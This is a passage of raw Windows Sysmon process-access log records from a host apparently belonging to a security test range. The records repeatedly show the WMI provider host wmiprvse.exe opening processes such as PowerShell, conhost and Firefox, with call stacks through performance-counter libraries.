Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150837Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.397{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150836Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.397{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150835Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.397{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150834Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.397{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150833Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.396{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150832Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.396{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150831Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.396{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150830Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.396{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150829Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.396{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150828Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.396{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150827Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.396{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150826Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.396{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150825Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.395{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150824Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.395{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150823Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.395{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150822Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 